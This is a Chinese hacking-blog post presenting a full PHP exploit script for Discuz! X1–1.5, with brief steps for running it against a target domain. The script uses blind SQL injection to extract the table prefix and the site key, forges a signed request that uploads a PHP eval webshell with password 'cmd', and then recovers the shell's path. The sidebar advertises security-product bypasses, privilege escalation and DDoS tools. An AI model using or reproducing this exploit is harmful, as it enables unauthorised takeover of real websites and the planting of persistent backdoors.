WEBSHELL

今天是

关于我联系我网站地图

现在位置:首页 » 关注cms » Discuz! X1.5前台getshell漏洞

Discuz! X1.5前台getshell漏洞
作者:T.H.E   分类:关注cms   评论(0)   浏览(22090)   关键词: Discuz! X1.5前台getshell漏洞

这个漏洞很久了 网络上也有 我现在之所以发出来是因为 这次比较详细

第一步自己本地搭建php环境

第二步保存下面exp代码为php

代码:

<?php
 
print_r('
 
+---------------------------------------------------------------------------+
 
Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by toby57    2010.11.05
 
mail: admin at bkey org
 
team: http://www.bkey.org
 
说明:alibaba把后续getshell代码添加了下去
 
+---------------------------------------------------------------------------+
 
');
 
if ($argc < 2) {
 
    print_r('
 
+---------------------------------------------------------------------------+
 
Usage: php '.$argv[0].' url [pre]
 
Example:
 
php '.$argv[0].' http://localhost/
 
php '.$argv[0].' http://localhost/ xss_
 
+---------------------------------------------------------------------------+
 
');
 
    exit;
 
}
 
error_reporting(7);
 
ini_set('max_execution_time', 0);
 
$url = $argv[1];
 
$pre = $argv[2]?$argv[2]:'pre_';
 
$target = parse_url($url);
 
extract($target);
 
$path1 = $path . '/api/trade/notify_credit.php';
 
$hash = array();
 
$hash = array_merge($hash, range(48, 57));
 
$hash = array_merge($hash, range(97, 102));
 
 
 
$tmp_expstr = "'";
 
$res = send();
 
if(strpos($res,'SQL syntax')==false){var_dump($res);die('Oooops.I can NOT hack it.');}
 
preg_match('/FROM\s([a-zA-Z_]+)forum_order/',$res,$match);
 
if($match[1])$pre = $match[1];
 
$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE ''='";
 
$res = send();
 
if(strpos($res,"doesn't exist")!==false){
 
    echo "Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n";
 
    for($i = 1;$i<20;$i++){
 
    $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',''))=$i AND ''='";
 
    $res = send();
 
 
 
    if(strpos($res,'SQL syntax')!==false){   
 
 
 
    $pre = '';
 
    $hash2 = array();
 
    $hash2 = array_merge($hash2, range(48, 57));
 
    $hash2 = array_merge($hash2, range(97, 122));
 
    $hash2[] = 95;
 
    for($j = 1;$j <= $i; $j++){
 
    for ($k = 0; $k <= 255; $k++) {
 
    if(in_array($k, $hash2)) {
 
    $char = dechex($k);
 
    $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',''),$j,1)=0x{$char} AND ''='";
 
    $res = send();
 
    if(strpos($res,'SQL syntax')!==false){
 
        echo chr($k);
 
        $pre .= chr($k);break;
 
    }  
 
    }  
 
    }     
 
    }     
 
    if(strlen($pre)){echo "\nCracked...Table_Pre:".$pre."\n";break;}else{die('GET Table_pre Failed..');};
 
    }    }    };
 
echo "Please Waiting....\n";
 
$sitekey = '';
 
for($i = 1;$i <= 32; $i++){
 
  for ($k = 0; $k <= 255; $k++) {
 
    if(in_array($k, $hash)) {
 
    $char = dechex($k);
 
$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ''='";
 
$res = send();
 
if(strpos($res,'SQL syntax')!==false){
 
        echo chr($k);
 
        $sitekey .= chr($k);break;
 
}}}}
 
/*
 
By: alibaba
修改与添加了一些代码,如果成功就能得到shell
一句话秘密是 : cmd
*/
 
if(strlen($sitekey)!=32) 
{
	echo "\nmy_sitekey not found. try blank my_sitekey\n";
}
 
else echo "\nmy_sitekey:{$sitekey}\n";
 
 
 
echo "\nUploading Shell...";
 
$module = 'video';
 
$method = 'authauth';
 
$params = 'a:3:{i:0;i:1;i:1;s:36:"PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=";i:2;s:3:"php";}';
 
$sign = md5($module . '|' . $method . '|' . $params . '|' . $sitekey);
 
$data = "module=$module&method=$method&params=$params&sign=$sign";
 
$path2 = $path . "/api/manyou/my.php";
 
POST($host,80,$path2,$data,30);
 
 
 
echo "\nGetting Shell Location...\n";
 
$file = '';
 
for($i = 1;$i <= 32; $i++){
 
	for ($k = 0; $k <= 255; $k++) {
 
    	if(in_array($k, $hash)) {
 
			$char = dechex($k);
 
			$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_member_field_home WHERE uid=1 AND MID(videophoto,{$i},1)=0x{$char} AND ''='";
 
			$res = send();
 
			if(strpos($res,'SQL syntax')!==false){
 
				echo chr($k);
 
				$file .= chr($k);break;
 
			}
 
		}
 
	}
 
}
 
echo "\nShell: $host$path/data/avatar/". substr($file,0,1) . "/" . substr($file,1,1) . "/$file.php";
exit;
 
 
function sign($exp_str){
    return md5("attach=tenpay&mch_vno={$exp_str}&retcode=0&key=");
}
 
 
 
function send(){
 
    global $host, $path1, $tmp_expstr;
 
     
 
    $expdata = "attach=tenpay&retcode=0&trade_no=%2527&mch_vno=".urlencode(urlencode($tmp_expstr))."&sign=".sign($tmp_expstr);
 
    return POST($host,80,$path1,$expdata,30);
 
}   
 
 
function POST($host,$port,$path,$data,$timeout, $cookie='') {
	$buffer='';
 
 
    $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
    if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno); 
	else {
        fputs($fp, "POST $path HTTP/1.0\r\n");
        fputs($fp, "Host: $host\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: ".strlen($data)."\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $data."\r\n\r\n");
       
 
		while(!feof($fp)) 
		{
			$buffer .= fgets($fp,4096);
		}
		
		fclose($fp);
    } 
	return $buffer;
} 
?>

保存为php 之后下一步

1.png

使用命令 :php.exe exp.php 域名

2.png

得到shell地址 和cmd加密的密码

shell我没链接成功不清楚是不是被杀了 默认密码是 cmd 

关键词:Powered by Discuz! X1.5 黑客

(ps:由于很久了的老漏洞 不是很好用 但是也处在这个漏洞)


    转载分享请注明原文地址(WEBSHELL):https://www.webshell.ren/post-247.html
分享本文至:

发表评论:

标签

  • 过狗总结
  • 免费资源
  • cms漏洞
  • 纯属扯淡
  • 渗透工具
  • 系统漏洞
  • 编辑器漏洞
  • 渗透教程
  • 提权exp分享
  • 站长资讯
  • 提权教程
  • 旁站工具
  • 一句话脚本
  • iis6写权限和遍历修复
  • 启动项目提权
  • 本人消失一段时间
  • asp大马后门
  • 搜狗问问存储型XSS
  • 批量discuz
  • 最新过狗菜刀
  • 7.2
  • 免杀pr
  • php读取iis配置脚本
  • 过安全宝
  • phpweb拿shell突破安全狗
  • Drupal
  • 实战某学校内网渗透
  • 7.31爆严重SQL注入漏洞【附exp】
  • 星外提权
  • windows
  • boot
  • manager
  • .htaccess
  • 301重定向
  • 免杀提权exp整理
  • 分享字典
  • 内网端口转发
  • 编辑器插一句话
  • wdcp虚拟主机管理系统
  • 过狗大马
  • CVE-2014-6332
  • 免费cdn加速
  • 附上exp
  • windows创建隐藏帐号
  • 指定渗透某大学
  • XYCMS漏洞整理
  • 内网渗透
  • emlog相册插件漏洞
  • 校园系统cms漏洞
  • Alan社工教程
  • 说明
  • pigcms&iwxcms漏洞利用工具
  • 批量上传黑页
  • IISPutScanner增强版
  • cc攻击防御
  • 椰树V1.9接口修复版
  • CVE-2014-3153
  • EXP
  • 搜索引擎分别CDN加速
  • MSSQL数据库提权
  • 新C段查询工具
  • 利用Apache解析漏洞拿下单子站
  • 内网渗透系列教程整理(原创)
  • 第一章节:讲解内网转发(原创)
  • sqlmap基本使用方法
  • 实战社工系列教程
  • cms漏洞集合
  • DDoS攻击
  • 12306信息泄密事件
  • 第二章节:内网域渗透(原创)
  • DDOS工具
  • wordpress上传漏洞
  • 支付宝自动转账支付代码
  • 突破SecureRDP拦截
  • 内网渗透第三章节1小节(原创)
  • 知名安全检测工具AWVSv9.5更新破解版本
  • 内网渗透第三章节0x2小节
  • 8.1权限提升漏洞POC
  • 渗透系列视频教程
  • 木马爆破工具集合
  • 记一次上传拿shell
  • 最新提星外主机系统思路(原创)
  • 过守护神总结
  • 对母校官方网站的一次渗透检测经历
  • 帝国CMS
  • 74CMS
  • 社会工程学系列
  • 文字语音调用代码
  • 法克论坛旁站查询工具
  • 数据泄露那些事情
  • Bitstamp
  • 翻墙网站
  • 黑掉ATM
  • aspcmsCSRF漏洞利用代码
  • 绕过各种CDN防护总结
  • 轻量级网站漏洞批量扫描器
  • 隐匿在Pastebin上的后门
  • 学校渗透系列一
  • ISIS黑客
  • SniffPass
  • -
  • 网络密码嗅探
  • 黑客组织“匿名者”
  • 谷歌把微软惹毛了
  • iPod
  • nano竟成ATM盗窃工具
  • 恶意软件可绕过密码
  • 马化腾QQ也曾被盗
  • 铁通被曝系统漏洞
  • Windows8.1漏洞
  • 白帽子借漏洞1元买几十万Model
  • Notepad++官网被圣战组织黑了
  • 苹果OSX的Spotlight文件搜索含泄漏用户隐私漏洞
  • 2014十大木马
  • 免费cdn加速整理
  • 韩国航空Facebook
  • Discuz!
  • X1.5前台getshell漏洞
  • 斯诺登又曝新料
  • 《英雄联盟》被曝植入木马
  • 2014年全球十大网络攻击事件
  • PolarSSL
  • 劫持301重定向快照流量
  • 过D盾的思路
  • 指定网站入侵
  • 比特币
  • 安全漏洞资讯
  • 黑客攻击
  • 自动批量SHELL一条龙
  • 域名爆破+Host查询
  • 黑客组织Anonymous
  • Burp
  • Suite
  • WordPress网站漏洞
  • 河马工具
  • kali系列教程
  • 网络资讯
  • MS15-077
  • MS15-051
  • 黑客交易吧2003渗透系统
  • 对国外黑客批量爆菊花
  • joomla反序列化漏洞
  • Dedecms延时注入漏洞
  • https
  • 安全狗
  • Nmap使用教程
  • linux
  • 工具收集
  • 腾讯安全网址拦截
  • 菜刀后门解析
    • 全球访问统计

        Free counters!
    • <-----------------------------------------------分界线----------------------------------------------->